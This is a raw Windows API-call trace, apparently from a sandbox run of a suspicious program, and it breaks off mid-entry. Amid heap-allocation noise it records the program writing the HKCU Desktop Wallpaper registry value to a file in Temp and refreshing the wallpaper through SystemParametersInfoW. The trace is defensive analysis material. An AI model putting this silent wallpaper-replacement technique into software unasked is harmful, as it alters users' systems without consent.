[0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0299.044] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0299.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0299.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0299.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0299.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0299.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0299.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0299.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0299.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0299.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0299.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0299.046] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0299.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0299.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0299.046] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0299.046] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0299.046] RegCloseKey (hKey=0x2d0) returned 0x0 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0299.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0299.047] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0299.047] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0299.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0299.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0299.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0299.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0299.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0299.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0299.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0299.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0299.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0299.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0299.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0299.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0299.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0299.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0299.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0299.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0299.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0299.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0299.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0299.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0299.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0299.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0299.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0299.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0299.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0299.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0299.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0299.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0299.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0299.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0299.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0299.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0299.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0299.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0299.089] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0299.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0299.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0299.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0299.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69a08 [0299.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69a08, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0299.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0299.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0299.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0299.091] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0299.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0299.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0299.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0299.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0299.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0299.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0299.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0299.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0299.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0299.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0299.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0299.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0299.092] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0299.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 